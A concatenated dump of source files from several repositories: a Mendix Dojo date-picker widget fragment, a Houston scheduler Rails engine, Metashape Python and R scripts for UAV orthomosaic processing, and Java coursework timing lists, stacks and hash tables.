this._alertDiv = null;
},
// Show an error message.
_showError: function (message) {
logger.debug(this.id + "._showError");
if (this._alertDiv !== null) {
dojoHtml.set(this._alertDiv, message);
return true;
}
this._alertDiv = dojoConstruct.create("div", {
"class": "alert alert-danger",
"innerHTML": message
});
dojoConstruct.place(this._alertDiv, this.domNode);
},
// Add a validation.
_addValidation: function (message) {
logger.debug(this.id + "._addValidation");
this._showError(message);
},
_updateRendering: function(callback) {
logger.debug(this.id + "._updateRendering");
if (this._contextObj !== null) {
dojoStyle.set(this.domNode, "display", "block");
var date = new Date(this._contextObj.get(this.dateAttr));
if (!isNaN(date.getTime())) {
this._picker.setDate(date, true);
}
} else {
dojoStyle.set(this.domNode, "display", "none");
}
this._clearValidations();
this._executeCallback(callback, "_updateRendering");
},
_execMf: function (mf, guid, cb) {
logger.debug(this.id + "._execMf");
if (mf && guid) {
mx.ui.action(mf, {
params: {
applyto: "selection",
guids: [guid]
},
callback: lang.hitch(this, function (objs) {
logger.debug(this.id + "._execMf cb");
if (cb && typeof cb === "function") {
cb(objs);
}
}),
error: function (error) {
console.debug(error.description);
}
}, this);
}
},
_executeCallback: function (cb, from) {
logger.debug(this.id + "._executeCallback" + (from ? " from " + from : ""));
if (cb && typeof cb === "function") {
cb();
}
}
});
});
require(["PickADayWidget/widget/PickADayWidget"]);
| 9c5979e22704ab50f9422b30a62cb7fcd83d3d5f | [
"Markdown",
"JavaScript"
] | 2 | Markdown | mendixlabs/PickADayWidget | 7bbef87dfa879be1497f7eddc57399d674e701bc | 67218e9a804b05ddfd0255d46f39658fdda27587 |
refs/heads/master | <repo_name>Nature40/UAV-Processing<file_sep>/metashapeToolbox/metashapeTools/msSparseCloud.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 4 10:00:09 2019
@author: marvin
"""
import Metashape
def createSparse(chunk, doc = Metashape.app.document, kpl = 40000, tpl = 4000):
# align photos
chunk.matchPhotos(downscale = 1, reference_preselection = True,
keypoint_limit = kpl, tiepoint_limit = tpl)
chunk.alignCameras(adaptive_fitting = True)
chunk.resetRegion()
# save document
doc.read_only = False
doc.save()
def filterSparse(chunk, doc = Metashape.app.document):
MF = Metashape.PointCloud.Filter()
# Reconstruction Accuracy Filter
for i in range(3-1):
MF.init(chunk, Metashape.PointCloud.Filter.ReconstructionUncertainty)
MF.selectPoints(50)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy = True, fit_b1=True, fit_b2 = True, fit_k1 = True, fit_k2 = True, fit_k3 = True, fit_k4=True, fit_p1 = True, fit_p2 =True)
chunk.resetRegion()
# Reprojection Error Filter
for i in range(4-1):
MF.init(chunk, Metashape.PointCloud.Filter.ReprojectionError)
MF.selectPoints(1)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy = True, fit_b1=True, fit_b2 = True, fit_k1 = True, fit_k2 = True, fit_k3 = True, fit_k4=True, fit_p1 = True, fit_p2 =True)
chunk.resetRegion()
# Projection Accuracy Filter
for i in range(2-1):
MF.init(chunk, Metashape.PointCloud.Filter.ProjectionAccuracy)
MF.selectPoints(10)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy = True, fit_b1=True, fit_b2 = True, fit_k1 = True, fit_k2 = True, fit_k3 = True, fit_k4=True, fit_p1 = True, fit_p2 =True)
chunk.resetRegion()
#------------------------------------------------------------------------
def exportSparse(chunk, doc = Metashape.app.document):
outpath = doc.path[:-4] # project path without file extension
crs = Metashape.CoordinateSystem("EPSG::25832")
# export filtered tiepoints
chunk.exportPoints(str(outpath + "_" + str(chunk.label) + "_tiepoints.las"), source_data = Metashape.DataSource.PointCloudData, save_colors = True, crs = crs)
# save document
doc.read_only = False
doc.save()
<file_sep>/uavImagetoolsR/seamlineClean.R
#' Seamline cutter
#'
#' @description Removes the distorted outer parts of the seamlines
#'
#' @param img sf, image exif data from imgExif
#' @param seam sf, seamline export from Metashape
#'
#' @import sf
#' @import stringr
#' @import concaveman
#'
#'
#'
seamlineClean = function(img, seam){
# concave hull of images
ch = concaveman::concaveman(img, concavity = 4)
# buffer -10 m
ch = sf::st_buffer(ch, dist = -10)
# check if image positions is 10 m inside the convex hull
img$inside = t(sf::st_contains(ch, img, sparse = FALSE))
# remove the last 4 character from string (file ending and .)
img$name = stringr::str_sub(img$FileName, end = -5)
# throw away outer seamlines
seam_cut = seam[seam$NAME %in% img$name[img$inside],]
return(seam_cut)
}
<file_sep>/uavImagetoolsR/imgGrid.R
#' Sample Image Grid
#' @description Samples a regular grid with equal distance between the images
#'
#' @param imgBB the bounding box to sample
#' @param gridsize distance between the images
#'
#' @return points with regular image location
#'
#' @author <NAME>
#'
#' @export
#
imgGrid = function(imgBB, gridsize){
# make sure imgBB is in UTM format
imgBB = st_transform(imgBB, crs = 25832)
# sample regular grid
s = sf::st_make_grid(imgBB, cellsize = gridsize, what = "centers")
# crop to optimal bounding box
s = st_intersection(s, imgBB)
s = st_transform(s, crs = 4326)
return(s)
}
<file_sep>/uavImagetoolsR/imgFilter.R
#' Sample Images
#' @description Images at sample poitns
#'
#' @param images bla
#'
#' @return
#'
#' @import sf
#'
#' @author <NAME>
#'
#' @export
#
sampleImages <- function(images, task, spacing = 20){
t = sampleTask(task, spacing)
s = st_nearest_feature(task, images)
img_sample = images[s,]
return(img_sample)
}
<file_sep>/uavImagetoolsR/imgExif.R
#' Read Exif from one mission
#' @description Reads the exif data from all images of a flight and returns them as points
#'
#' @param imgPath directory with the images
#'
#' @return sf points of image positions
#'
#' @import exifr
#' @import sf
#'
#' @author <NAME>
#'
#' @export
imgExif <- function(imgPath){
# read exif data from images with important exif tags
img_exif <- exifr::read_exif(imgPath, recursive = TRUE, tags = c("SourceFile", "Directory", "FileName", "DateTimeOriginal",
"GPSLongitude", "GPSLatitude", "GPSAltitude"))
# remove points with no GPS signal
img_exif <- img_exif[!is.na(img_exif$GPSLatitude),]
# timestamp as POSIXct, order images by date
img_exif$time <- as.POSIXct(img_exif$DateTimeOriginal, format = "%Y:%m:%d %H:%M:%S")
img_exif <- img_exif[order(img_exif$time),]
# add geometry information
img_exif <- sf::st_as_sf(img_exif, coords = c("GPSLongitude", "GPSLatitude", "GPSAltitude"), crs = 4326 ,dim = "XYZ")
return(img_exif)
}
<file_sep>/metashapeToolbox/msTC_01.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 09:06:49 2019
@author: um2
"""
import Metashape
import metashapeTools.msSparseCloud as mt
for chunk in Metashape.app.document.chunks:
mt.createSparse(chunk)<file_sep>/uavImagetoolsR/taskSample.R
#' Sample points along the flight path
#' @description Samples regular spaced points along the UAV flight path
#'
#' @param task sf points from \code{\link[readTask]{readTask}}
#' @param spacing distance between the sample points
#'
#' @return
#'
#' @author <NAME>
#'
#' @import dplyr
#' @import sf
#'
#' @export
#
sampleTask <- function(task, spacing = 20){
# convert to line
l = task %>% dplyr::summarise(do_union = FALSE) %>% sf::st_cast("LINESTRING")
# sample regular grid
l = sf::st_sample(l, size = as.numeric(round(sf::st_length(l) / spacing)), type = "regular")
l = st_cast(l, to = "POINT")
return(l)
}
<file_sep>/metashapeToolbox/metashapeTools/msDenseCloud.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 12 13:32:25 2019
@author: um2
"""
# import markers
import Metashape
import sys
# control: do with all chunks or just the active one
allchunks = sys.argv[1]
# Here starts the process after the GCP were set and corrected.
# Start with point cloud filtering and then build the densecloud
def filterSparse(chunk, doc = Metashape.app.document):
chunk.resetRegion()
MF = Metashape.PointCloud.Filter()
# Reconstruction uncertanty
MF.init(chunk, Metashape.PointCloud.Filter.ReconstructionUncertainty)
MF.selectPoints(50)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cxcy=True, fit_aspect=True, fit_skew=True, fit_k1k2k3=True, fit_p1p2=True, fit_k4=True)
chunk.resetRegion()
# Reprojection Error Filter
MF.init(chunk, Metashape.PointCloud.Filter.ReprojectionError)
MF.selectPoints(0.9)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cxcy=True, fit_aspect=True, fit_skew=True, fit_k1k2k3=True, fit_p1p2=True, fit_k4=True)
chunk.resetRegion()
# Projection Accuracy Filter
MF.init(chunk, Metashape.PointCloud.Filter.ProjectionAccuracy)
MF.selectPoints(10)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cxcy=True, fit_aspect=True, fit_skew=True, fit_k1k2k3=True, fit_p1p2=True, fit_k4=True)
chunk.resetRegion()
# save document
doc.read_only = False
doc.save()
def createDenseCloud(chunk, doc = Metashape.app.document):
# build depth maps with moderate filter
chunk.buildDepthMaps(quality = Metashape.Quality.HighQuality, filter = Metashape.FilterMode.ModerateFiltering, reuse_depth=True)
# build dense cloud
chunk.buildDenseCloud(point_colors=True, keep_depth=True)
doc.read_only = False
doc.save()
# control: do with all chunks or just the active one
def createDenseCloudControl(allchunks):
print(allchunks)
if allchunks == "1":
for i in Metashape.app.document.chunks:
filterSparse(chunk = i)
createDenseCloud(chunk = i)
else:
filterSparse(chunk = Metashape.app.document.chunk)
createDenseCloud(chunk = Metashape.app.document.chunk)
# RUN CONTROL
createDenseCloudControl(allchunks)
<file_sep>/metashapeToolbox/msTC_02.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 09:08:10 2019
@author: um2
"""
import Metashape
import metashapeTools.msSparseCloud as mt
import metashapeTools.msOrtho as mo
for chunk in Metashape.app.document.chunks:
mt.filterSparse(chunk)
mt.exportSparse(chunk)
mo.sparse2ortho(chunk)
mo.exportOrtho(chunk)
<file_sep>/metashapeToolbox/metashapeTools/msOrtho.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 8 09:47:53 2019
@author: marvin
"""
import Metashape
# control: do with all chunks or just the active one
def sparse2ortho(chunk, doc = Metashape.app.document, orthoRes = 0.05):
# create mesh
chunk.resetRegion()
chunk.buildModel(surface_type=Metashape.SurfaceType.HeightField, source_data = Metashape.DataSource.PointCloudData,
interpolation = Metashape.Interpolation.EnabledInterpolation, face_count = Metashape.FaceCount.HighFaceCount)
chunk.smoothModel(35)
doc.save()
# build ortho
chunk.resetRegion()
chunk.buildOrthomosaic(surface_data=Metashape.ModelData, resolution = orthoRes)
doc.save()
#def dense2ortho(chunk, doc = Metashape.app.document, orthoRes = 0.05):
def exportOrtho(chunk, doc = Metashape.app.document, orthoRes = 0.05):
outpath = doc.path[:-4] # project path without file extension
# export ortho
chunk.resetRegion()
chunk.exportRaster(str(outpath + "_" + str(chunk.label) + "_orthomosaic.tif"),
raster_transform = Metashape.RasterTransformNone,save_alpha=False,
white_background=True, resolution = orthoRes, source_data = Metashape.DataSource.OrthomosaicData)
# save document
doc.read_only = False
doc.save()
# create report
chunk.exportReport(outpath + "_" + chunk.label + "_report.pdf")
def exportSeamlines(chunk, doc = Metashape.app.document):
outpath = doc.path[:-4]
chunk.buildSeamlines(epsilon = 0)
# save document
doc.read_only = False
doc.save()
chunk.exportShapes(path = str(outpath + "_" + str(chunk.label) + "_seamlines.geojson"), save_polygons = True)
<file_sep>/uavImagetoolsR/taskRead.R
#' Read UAV Task
#'
#' @description Reads a UAV mavlink flight task and converts to sf points
#'
#' @param taskfile filepath of the task
#'
#' @author <NAME>
#'
#' @import sf
#' @export
#'
taskRead <- function(taskfile){
t <- read.table(taskfile, skip = 1, header = FALSE)
# filter waypoints
t <- t[t$V9 != 0,]
# cut of taxi way
t <- t[c(which(t$V1 == 7):nrow(t)),]
t <- sf::st_as_sf(t, coords = c("V10", "V9"), dim = "XY",crs = 4326)
return(t)
}
<file_sep>/uavImagetoolsR/boundingBox.R
#' Rectangle area around points
#'
#' Creates optimal rectangle bounding box around points
#'
#' @param points a sf object, points
#' @param buffer buffer distance between the points and the rectangle; defaults 0
#' @param epsg projection of the output polygon
#'
#' @return sf polygon
#'
#' @author <NAME>
#'
#' @details The code is based on a Rotating Caliper Algorithm and mostly copy and pasted (see reference)
#'
#' @references http://dwoll.de/rexrepos/posts/diagBounding.html
#'
#' @export
boundingBox <- function(points, buffer = 0, epsg = 4326){
# #-------------------------------------------------------
# here starts the copies algorithm from:
# http://dwoll.de/rexrepos/posts/diagBounding.html
optimalBB <- function(xy){
stopifnot(is.matrix(xy), is.numeric(xy), nrow(xy) >= 2, ncol(xy) == 2)
## rotating calipers algorithm using the convex hull
H <- chull(xy) ## hull indices, vertices ordered clockwise
n <- length(H) ## number of hull vertices
hull <- xy[H, ] ## hull vertices
## unit basis vectors for all subspaces spanned by the hull edges
hDir <- diff(rbind(hull, hull[1, ])) ## hull vertices are circular
hLens <- sqrt(rowSums(hDir^2)) ## length of basis vectors
huDir <- diag(1/hLens) %*% hDir ## scaled to unit length
## unit basis vectors for the orthogonal subspaces
## rotation by 90 deg -> y' = x, x' = -y
ouDir <- cbind(-huDir[ , 2], huDir[ , 1])
## project hull vertices on the subspaces spanned by the hull edges, and on
## the subspaces spanned by their orthogonal complements - in subspace coords
projMat <- rbind(huDir, ouDir) %*% t(hull)
## range of projections and corresponding width/height of bounding rectangle
rangeH <- matrix(numeric(n*2), ncol=2) ## hull edge
rangeO <- matrix(numeric(n*2), ncol=2) ## orthogonal subspace
widths <- numeric(n)
heights <- numeric(n)
for(i in seq(along=numeric(n))) {
rangeH[i, ] <- range(projMat[ i, ])
## the orthogonal subspace is in the 2nd half of the matrix
rangeO[i, ] <- range(projMat[n+i, ])
widths[i] <- abs(diff(rangeH[i, ]))
heights[i] <- abs(diff(rangeO[i, ]))
}
## extreme projections for min-area rect in subspace coordinates
## hull edge leading to minimum-area
eMin <- which.min(widths*heights)
hProj <- rbind( rangeH[eMin, ], 0)
oProj <- rbind(0, rangeO[eMin, ])
## move projections to rectangle corners
hPts <- sweep(hProj, 1, oProj[ , 1], "+")
oPts <- sweep(hProj, 1, oProj[ , 2], "+")
## corners in standard coordinates, rows = x,y, columns = corners
## in combined (4x2)-matrix: reverse point order to be usable in polygon()
## basis formed by hull edge and orthogonal subspace
basis <- cbind(huDir[eMin, ], ouDir[eMin, ])
hCorn <- basis %*% hPts
oCorn <- basis %*% oPts
pts <- t(cbind(hCorn, oCorn[ , c(2, 1)]))
## angle of longer edge pointing up
dPts <- diff(pts)
e <- dPts[which.max(rowSums(dPts^2)), ] ## one of the longer edges
eUp <- e * sign(e[2]) ## rotate upwards 180 deg if necessary
deg <- atan2(eUp[2], eUp[1])*180 / pi ## angle in degrees
pts <- rbind(pts, pts[1,])
return(pts)
}
#----------#-----------#------------#----------------#
#-----------#------------#-------------#-------------#
# input and conversion
#--------------------------
xy <- do.call(rbind, st_geometry(points))
# call the Rotating Caliper Algorithm
pts <- optimalBB(xy)
# convert to polygon
sf_pts <- st_sfc(st_polygon(list(pts)), crs = st_crs(points))
# square buffer
pts_buffer <- st_buffer(sf_pts, dist = buffer, nQuadSegs = 40, endCapStyle = "FLAT",
joinStyle = "MITRE", mitreLimit = Inf)
pts_buffer <- st_sfc(pts_buffer, crs = st_crs(points))
pts_buffer <- st_transform(pts_buffer, crs = epsg)
# return spatial object
return(pts_buffer)
}
<file_sep>/metashapeToolbox/msPurgeImages.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 4 10:00:09 2019
@author: marvin
"""
import Metashape
# import sys
import glob
import os
# control: do with all chunks or just the active one
# allchunks = sys.argv[1]
def purgeImages(chunk, doc = Metashape.app.document):
# get list of all images in chunk
usedImg = []
for c in chunk.cameras:
usedImg.append(c.photo.path)
# get all images
allImg = glob.glob(os.path.dirname(usedImg[0]) + "/*.JPG")
rmImg = set(allImg) - set(usedImg)
# confirmation prompt
confirm_msg = "Remove unused Cameras from Harddrive? Yes = 1, No = 0"
confirm = Metashape.app.getInt(confirm_msg ,0)
if (confirm == 1):
for i in rmImg:
os.remove(i)
print("Removed images")
else:
print("Deleting images needs confirmation!")
# run function
purgeImages(chunk = Metashape.app.document.chunk)
<file_sep>/README.md
# UAV-Processing
Collection of Python and R Scripts for UAV image processing.
## Metashape Toolbox
The Metashape Toolbox contains workflows for the creation of orthomosaics with Agisoft Metashape.
The workflows consists of Metashape Modules with preconfigured parameters to establish a standardized processing of UAV images.
Create a toolchain with functions you find in metashapeTools:
```{python}
import Metashape
import metashapeTools.msSparseCloud as sp
import metashapeTools.msOrtho as ot
chunk = Metashape.app.document.chunk()
# align images and create sparse cloud
mt.createSparse(chunk)
# filter the sparse cloud (ReconstructionUncertainty, ReprojectionError, ProjectionAccuracy)
mt.filteSparse(chunk)
# create a mesh and a orthomosaic
ot.sparse2Ortho(chunk)
```
## R imagetools
Contains functions to read flight tasks, read exif data and sample/filter images.
<file_sep>/metashapeToolbox/msSubsetImages.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# script version 0.2.1
# source: https://www.agisoft.com/forum/index.php?topic=5681.0
import Metashape
chunk = Metashape.app.document.chunk
step = Metashape.app.getInt("Specify the selection step:" ,2)
index = 1
for camera in chunk.cameras:
if not (index % step):
camera.selected = True
else:
camera.selected = False
index += 1
<file_sep>/metashapeToolbox/msExportTiepointError.py
import Metashape
import csv
# export the coordinates into a python list X Y Z
def getPointCoords(chunk):
# source: https://www.agisoft.com/forum/index.php?topic=11218.0
# init result lists
pX, pY, pZ, = [],[],[]
for point in chunk.point_cloud.points:
cov = point.cov
coord = point.coord
V = chunk.transform.matrix * point.coord
V.size = 3
X, Y, Z = chunk.crs.project(V)
pX.append(X)
pY.append(Y)
pZ.append(Z)
return([pX,pY,pZ])
def getErrors(chunk):
MF = Metashape.PointCloud.Filter()
MF.init(chunk, Metashape.PointCloud.Filter.ReconstructionUncertainty)
RU = MF.values
MF.init(chunk, Metashape.PointCloud.Filter.ReprojectionError)
RE = MF.values
MF.init(chunk, Metashape.PointCloud.Filter.ProjectionAccuracy)
PA = MF.values
MF.init(chunk, Metashape.PointCloud.Filter.ImageCount)
IC = MF.values
return([RU,RE,PA,IC])
def writeErrors(chunk, filename):
# create file header colnames
fheader = ["x","y","z","RU","RE","PA","IC"]
# call both functions for values
res = getPointCoords(chunk) + getErrors(chunk)
# transpose output for csv writing
res = list(map(list, zip(*res)))
# open file connection and write line by line
f = open(filename, "w")
w = csv.writer(f)
w.writerow(fheader)
w.writerows(res)
f.flush()
f.close()
def msExportTiepointError(chunk, filename = None):
# create a filename of not specified
if not filename:
filename = str(Metashape.app.document.path[:-4] + "_" + str(chunk.label) + "tiepoint_errors.txt")
writeErrors(chunk, filename)
for chunk in Metashape.app.document.chunks:
msExportTiepointError(chunk)
| f71a732d825400c643f246944349001dfa74cf15 | [
"Markdown",
"Python",
"R"
] | 16 | Python | Nature40/UAV-Processing | 916e417e92ef568f3aa35f222d3f2ca95279c03b | a424180af111f2daa473ccccb4840bd60deb5a0e |
refs/heads/master | <file_sep>module Houston
module Scheduler
class TicketsController < ApplicationController
def update
@ticket = Ticket.find(params[:id])
@project = ticket.project
extended_attributes = @ticket.extended_attributes
if params.key?(:estimatedEffort)
authorize! :estimate, project
extended_attributes["estimated_effort"] = params[:estimatedEffort]
end
if params.key?(:estimatedValue)
authorize! :prioritize, project
extended_attributes["estimated_value"] = params[:estimatedValue]
end
if params.key?(:unableToSetEstimatedEffort)
authorize! :estimate, project
extended_attributes["unable_to_set_estimated_effort"] = params[:unableToSetEstimatedEffort]
end
if params.key?(:unableToSetEstimatedValue)
authorize! :prioritize, project
extended_attributes["unable_to_set_estimated_value"] = params[:unableToSetEstimatedValue]
end
if ticket.update_attributes(extended_attributes: extended_attributes)
render json: [], :status => :ok
else
render json: ticket.errors, :status => :unprocessable_entity
end
end
def update_order
@project = Project.find_by_slug!(params[:slug])
ids = Array.wrap(params[:order]).map(&:to_i).reject(&:zero?)
if ids.length > 0
Ticket.transaction do
project.tickets.where(Ticket.arel_table[:id].not_in(ids))
.update_all("extended_attributes = extended_attributes || 'sequence=>NULL'::hstore")
ids.each_with_index do |id, i|
Ticket.where(id: id).update_all("extended_attributes = extended_attributes || 'sequence=>#{i+1}'::hstore")
end
end
elsif params[:order] == "empty"
project.tickets.update_all("extended_attributes = extended_attributes || 'sequence=>NULL'::hstore")
end
head :ok
end
attr_reader :ticket, :project
end
end
end
<file_sep>Rails.application.routes.draw do
mount Houston::Scheduler::Engine => "/houston-scheduler"
end
<file_sep>Houston::Scheduler::Engine.routes.draw do
root :to => "scheduler#index", :as => :demo
get "mixer", :to => "mixer#index", :as => :mixer
put "mixer", :to => "mixer#update"
get "by_project/:slug", :to => "scheduler#project", :as => :project
put "by_project/:slug/ticket_order", :to => "tickets#update_order"
put "tickets/:id", :to => "tickets#update", constraints: {id: /\d+/}
end
<file_sep>require 'houston/scheduler/engine'
module Houston
module Scheduler
extend self
def menu_items_for(context={})
projects = context[:projects]
ability = context[:ability]
user = context[:user]
projects = projects.select { |project| ability.can?(:read, project) }
return [] if projects.empty?
menu_items = []
menu_items << MenuItem.new("Mixer", Engine.routes.url_helpers.mixer_path)
menu_items << MenuItem.new("Demo", Engine.routes.url_helpers.demo_path) if user.administrator?
menu_items << MenuItemDivider.new
menu_items.concat projects.map { |project| ProjectMenuItem.new(project, Engine.routes.url_helpers.project_path(project)) }
menu_items
end
end
end
<file_sep>$:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "houston/scheduler/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "houston-scheduler"
s.version = Houston::Scheduler::VERSION
s.authors = ["<NAME>"]
s.email = ["<EMAIL>"]
s.homepage = "https://github.com/houstonmc/houston-scheduler"
s.summary = "A module for Houston that projects schedules for work based on information about tasks' effort and payoff."
s.description = "Given effort and value of to-do list items, Houston::Scheduler employs different strategies for sequencing work. Then it projects a schedule based on your Work-in-Progress constraints"
s.files = Dir["{app,config,db,lib}/**/*"] + ["LICENSE.txt", "Rakefile", "README.md"]
s.test_files = Dir["test/**/*"]
s.add_dependency "rails", "~> 3.2.9"
s.add_dependency "sass-rails", "~> 3.2.3"
s.add_dependency "coffee-rails", "~> 3.2.1"
s.add_dependency "handlebars_assets"
# s.add_dependency "jquery-rails"
s.add_development_dependency "sqlite3"
s.add_development_dependency "konacha"
s.add_development_dependency "poltergeist"
end
<file_sep># Houston::Scheduler
A module for Houston that projects schedules for work based on information about tasks' effort and payoff.
## Installation
In your [Houston](https://github.com/houstonmc/houston) `config/config.rb` file, add:
use :scheduler
And then execute:
$ bundle
Run Houston and you can navigate to the scheduler at the path '/scheduler'
## Usage
TODO: Write usage instructions here
## Contributing
1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request
<file_sep>#!/usr/bin/env rake
begin
require 'bundler/setup'
rescue LoadError
puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
end
begin
require 'rdoc/task'
rescue LoadError
require 'rdoc/rdoc'
require 'rake/rdoctask'
RDoc::Task = Rake::RDocTask
end
task 'load_app' do
# load_app is defined and invoked in engine.rake, below
# we have to sneak in our additions so konacha is loaded.
require 'action_controller/railtie'
require 'konacha'
load 'tasks/konacha.rake'
module Konacha
def self.spec_root
Houston::Scheduler::Engine.config.root + config.spec_dir
end
end
class Konacha::Engine
initializer "konacha.engine.environment", after: "konacha.environment" do
# Rails.application is the dummy app in test/dummy
Rails.application.config.assets.paths << Houston::Scheduler::Engine.config.root + Konacha.config.spec_dir
end
end
require 'capybara/poltergeist'
Konacha.configure do |config|
config.driver = :poltergeist
end if defined?(Konacha)
end
APP_RAKEFILE = File.expand_path("../test/dummy/Rakefile", __FILE__)
load 'rails/tasks/engine.rake'
Bundler::GemHelper.install_tasks
require 'rake/testtask'
Rake::TestTask.new(:test) do |t|
t.libs << 'lib'
t.libs << 'test'
t.pattern = 'test/**/*_test.rb'
t.verbose = false
end
task :default => :test
<file_sep>module Houston
module Scheduler
class Engine < ::Rails::Engine
isolate_namespace Houston::Scheduler
# Enabling assets precompiling under rails 3.1
if Rails.version >= '3.1'
initializer :assets do |config|
Rails.application.config.assets.precompile += %w( houston-scheduler/application.js houston-scheduler/application.css )
end
end
end
end
end
<file_sep># To-Do
- Allow specifing prerequisites for tickets
- Calculate prerequisites/dependencies when applying Queuing Discipline
- **Scheduler:** Click to edit ticket in a popup
- Allow estimating only be certain users/roles
- Allow custom queueing disciplines
<file_sep>require 'test_helper'
class HoustonSchedulerTest < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, Houston::Scheduler
end
end
| 42186a9eccbd270ae32a5f994dfae4ef675c9cbf | [
"Markdown",
"Ruby"
] | 10 | Ruby | lukebooth/houston-scheduler | afa397dddd4d1cb1858e86ed483e5f8fe1a617dd | 92c98916950f4dbf9aee95cfcadd95c49b60d207 |
refs/heads/master | <file_sep>package com.tiago.melo.estruturas;
import java.util.Enumeration;
import java.util.Hashtable;
import java.util.UUID;
import com.tiago.melo.estruturas.utils.Pessoa;
import com.tiago.melo.estruturas.utils.Utils;
import com.tiago.melo.interfaces.TestaEstrutura;
public class TesteTabelaHash implements TestaEstrutura {
@Override
public void geraEstruturaDefault(int tamanho) {
long start = System.currentTimeMillis();
Hashtable<String, Integer> numbers = new Hashtable<String, Integer>();
for (int i = 0; i < tamanho; i++) {
numbers.put(UUID.randomUUID().toString(), i);
}
Enumeration<String> elements = numbers.keys();
while (elements.hasMoreElements()) {
System.out.println("--------");
String key = elements.nextElement();
System.out.println("Key = " + key);
System.out.println("Value = " + numbers.get(key));
}
long finish = System.currentTimeMillis();
System.out.println("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
}
@Override
public void geraEstruturaCustomizada(int tamanho) {
long start = System.currentTimeMillis();
Hashtable<String, Pessoa> numbers = new Hashtable<String, Pessoa>();
for (int i = 0; i < tamanho; i++) {
String randomStr = UUID.randomUUID().toString();
numbers.put(randomStr, new Pessoa(i, randomStr));
}
Enumeration<String> elements = numbers.keys();
while (elements.hasMoreElements()) {
System.out.println("--------");
String key = elements.nextElement();
System.out.println("Key = " + key);
System.out.println("Value = " + numbers.get(key));
}
long finish = System.currentTimeMillis();
System.out.println("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
}
@Override
public void adicionaTempoDeExecucao() {
// TODO Auto-generated method stub
}
}
<file_sep>package com.tiago.melo.estruturas.utils;
import java.io.BufferedWriter;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.nio.file.DirectoryNotEmptyException;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.NoSuchFileException;
import java.nio.file.Path;
public class Utils {
public static boolean imprimeEstrutura = false;
static String fileName = "log.txt";
public static void criaLogDeExecucao(String conteudo) {
try (PrintWriter out = new PrintWriter(
new BufferedWriter(new OutputStreamWriter(new FileOutputStream(fileName, true))))) {
out.println(conteudo);
} catch (IOException e) {
System.err.println("Exceção ao criar arquivo.");
}
System.out.println("Arquivo de log criado!");
}
public static void apagaLogDeExecucao() {
Path path = FileSystems.getDefault().getPath("log.txt");
try {
Files.deleteIfExists(path);
} catch (NoSuchFileException x) {
System.err.format("%s: no such" + " file or directory%n", fileName);
} catch (DirectoryNotEmptyException x) {
System.err.format("%s not empty%n", fileName);
} catch (IOException x) {
// File permission problems are caught here.
System.err.println(x);
}
System.out.println("Arquivo de log apagado!");
}
}
<file_sep># trabalho_algoritmo
Trabalho do MPCOMP de algoritmos e estrutura de dados. Utilizar estrutura de dados lista encadeada, fila de prioridade, pilha, tabela hash e verificar seu desempenho.
<file_sep>package com.tiago.melo.interfaces;
public interface TestaEstrutura {
/**
* Cria estrutura com Tipo Integer
*
* @param tamanho tamanho da estrutura gerada
*/
public void geraEstruturaDefault(int tamanho);
/**
* Cria estrutura com tipo de dado customizado usando
* classe Pessoa
*
* @param tamanho tamanho da estrutura gerada
*/
public void geraEstruturaCustomizada(int tamanho);
public void adicionaTempoDeExecucao();
}
<file_sep>package com.tiago.melo.estruturas;
import java.util.LinkedList;
import java.util.Queue;
import java.util.UUID;
import com.tiago.melo.estruturas.utils.Pessoa;
import com.tiago.melo.estruturas.utils.Utils;
import com.tiago.melo.interfaces.TestaEstrutura;
public class TestePilha implements TestaEstrutura {
@Override
public void geraEstruturaDefault(int tamanho) {
long start = System.currentTimeMillis();
Queue<Integer> queue = new LinkedList<Integer>();
for (int indice = tamanho; indice >= 0; indice--)
queue.add(indice);
while (!queue.isEmpty()) {
System.out.println(queue.remove());
}
long finish = System.currentTimeMillis();
System.out.println("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaDefault: " + (finish - start));
}
@Override
public void geraEstruturaCustomizada(int tamanho) {
long start = System.currentTimeMillis();
Queue<Pessoa> queue = new LinkedList<Pessoa>();
for (int i = tamanho; i >= 0; i--)
queue.add(new Pessoa(i, UUID.randomUUID().toString()));
while (!queue.isEmpty()) {
System.out.println(queue.remove());
}
long finish = System.currentTimeMillis();
System.out.println("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
Utils.criaLogDeExecucao("Tempo de execução do método geraEstruturaCustomizada: " + (finish - start));
}
@Override
public void adicionaTempoDeExecucao() {
// TODO Auto-generated method stub
}
}
<file_sep>package com.tiago.melo.estruturas;
import java.util.Comparator;
